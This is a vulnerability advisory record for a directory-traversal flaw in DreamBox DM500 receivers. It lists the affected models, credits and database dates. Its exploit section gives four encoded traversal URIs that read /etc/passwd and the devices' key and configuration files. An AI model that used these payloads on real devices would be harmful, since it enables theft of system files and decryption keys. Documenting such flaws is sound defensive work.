ID
VAR-E-201105-0595
TITLE
DreamBox Multiple DM500 Products Directory Traversal Vulnerability
Trust: 0.3
DESCRIPTION
DreamBox DM500 products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
The following products are vulnerable:
DreamBox DM500
DreamBox DM500+
DreamBox DM500HD
DreamBox DM500S
Trust: 0.3
AFFECTED PRODUCTS
vendor: dream | model: multimedia dreambox dm800 | scope: - | version: - | Trust: 0.3
vendor: dream | model: multimedia dreambox dm500s | scope: - | version: - | Trust: 0.3
vendor: dream | model: multimedia dreambox dm500hd | scope: - | version: - | Trust: 0.3
vendor: dream | model: multimedia dreambox dm500+ | scope: - | version: - | Trust: 0.3
vendor: dream | model: multimedia dreambox dm500 | scope: - | version: - | Trust: 0.3
EXPLOIT
An attacker can exploit this issue with a web browser.
The following example URIs are available:
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Input Validation Error
Trust: 0.3
CREDITS
LiquidWorm
Trust: 0.3
EXTERNAL IDS
db: BID | id: 47844 | Trust: 0.3
REFERENCES
url: http://www.dream-multimedia-tv.de | Trust: 0.3
SOURCES
db: BID | id: 47844
LAST UPDATE DATE
2022-07-27T09:16:14.899000+00:00
SOURCES UPDATE DATE
db: BID | id: 47844 | date: 2011-06-28T17:00:00
SOURCES RELEASE DATE
db: BID | id: 47844 | date: 2011-05-13T00:00:00